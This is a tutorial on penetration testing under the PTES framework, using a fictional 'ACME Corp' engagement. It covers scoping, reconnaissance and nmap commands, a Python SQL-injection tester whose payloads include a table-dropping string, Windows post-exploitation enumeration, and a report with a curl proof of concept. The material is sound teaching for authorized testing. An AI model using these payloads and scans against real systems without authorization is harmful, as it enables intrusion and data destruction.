Penetration Testing Methodology


Introduction

Penetration testing simulates real-world attacks to identify security vulnerabilities before adversaries exploit them. A structured methodology ensures consistent, repeatable, and comprehensive assessments. The Penetration Testing Execution Standard (PTES) provides a widely adopted framework.

The PTES Standard

PTES defines seven phases for penetration testing, each with specific activities and deliverables.

Phase 1: Pre-Engagement Interactions

Define scope, rules of engagement, and legal boundaries before any testing begins.




rules_of_engagement:


client: "ACME Corp"


scope:


in_scope:


- "*.acme.com"


- "203.0.113.0/24"


out_of_scope:


- "payment.acme.com" # Production payment system


- "10.0.0.0/8" # Internal only




restrictions:


- no_social_engineering: true


- no_dos_attacks: true


- testing_window: "2026-05-15T00:00Z - 2026-05-19T23:59Z"


- notification_list: ["security@acme.com", "incident-response@acme.com"]




legal:


- authorized_signatory: "Jane Doe, CISO"


- insurance_coverage: true


- data_handling_nda_signed: true





Phase 2: Intelligence Gathering (Reconnaissance)

Reconnaissance builds a target profile through passive and active information gathering.




# Passive recon — DNS enumeration


dig axfr @ns1.acme.com acme.com


dnsrecon -d acme.com -t axfr


dnsrecon -d acme.com -t std --db acme_recon.db




# Subdomain discovery


sublist3r -d acme.com -o subdomains.txt




# Technology fingerprinting


whatweb -a 3 https://www.acme.com --log-verbose=tech_report.txt




# Certificate transparency logs


curl -s "https://crt.sh/?q=%.acme.com&output=json" | jq -r '.[].name_value' | sort -u





Phase 3: Vulnerability Analysis

Analyze gathered information to identify potential vulnerabilities.




# Port scanning with Nmap


nmap -sV -sC -O -p- --min-rate=1000 -oA acme_scan 203.0.113.0/24




# Service enumeration


nmap -sV --script=http-enum,http-headers,http-methods,ssl-enum-ciphers \


-p 80,443 203.0.113.0/24 -oA acme_web_scan




# Vulnerability scanning


nmap --script=vuln -p 80,443,22,3389 203.0.113.0/24 -oA acme_vuln





Phase 4: Exploitation

Exploitation attempts to breach the target using identified vulnerabilities.




# Custom exploit example — SQL injection test


import requests




def test_sqli(url, params):


payloads = [


"' OR '1'='1",


"' UNION SELECT NULL,NULL--",


"1; DROP TABLE users--",


"' WAITFOR DELAY '00:00:05'--",


]




for param, value in params.items():


for payload in payloads:


test_params = params.copy()


test_params[param] = payload




start = time.time()


resp = requests.get(url, params=test_params, timeout=10)


elapsed = time.time() - start




# Time-based detection


if elapsed > 5:


print(f"[!] Time-based SQLi in {param}: {payload}")




# Error-based detection


if any(err in resp.text for err in ["SQL syntax", "mysql_fetch", "ORA-"]):


print(f"[!] Error-based SQLi in {param}: {payload}")





Phase 5: Post-Exploitation

After gaining access, assess the value of compromised systems and establish persistence.




# Post-exploitation enumeration


whoami /all


systeminfo | findstr /B "OS Name OS Version System Type"


net localgroup administrators


netstat -ano


wmic product get name,version




# Lateral movement check


powershell -Command "Get-WmiObject -Class Win32_ComputerSystem -ComputerName TARGET"





Phase 6: Reporting

The report is the primary deliverable. It must be clear, actionable, and properly scoped for different audiences.




report_structure:


executive_summary:


- risk_rating: "High"


- total_findings: 12


- critical: 2


- high: 4


- medium: 4


- low: 2


- business_impact: "SQL injection in main application could lead to complete data breach"




technical_findings:


- finding_id: "F-001"


title: "SQL Injection in /api/search endpoint"


severity: "Critical"


cvss: 9.1


description: "User input is directly concatenated into SQL queries"


affected_endpoint: "POST /api/search"


poc: "curl -X POST https://app.acme.com/api/search -d 'query=1%27+OR+%271%27%3D%271'"


remediation: "Use parameterized queries; implement input validation"




remediation_timeline:


- immediate: "Patch critical SQL injection and RCE vulnerabilities"


- short_term: "Implement WAF and input validation"


- long_term: "Security training for developers, SAST integration in CI/CD"





Phase 7: Post-Engagement

Cleanup, evidence destruction, and lessons learned.

Conclusion

Effective penetration testing follows a disciplined methodology. PTES provides comprehensive coverage from legal agreements through reporting. The true value of a pentest lies not in how many vulnerabilities are found, but in the actionable remediation guidance provided in the final report.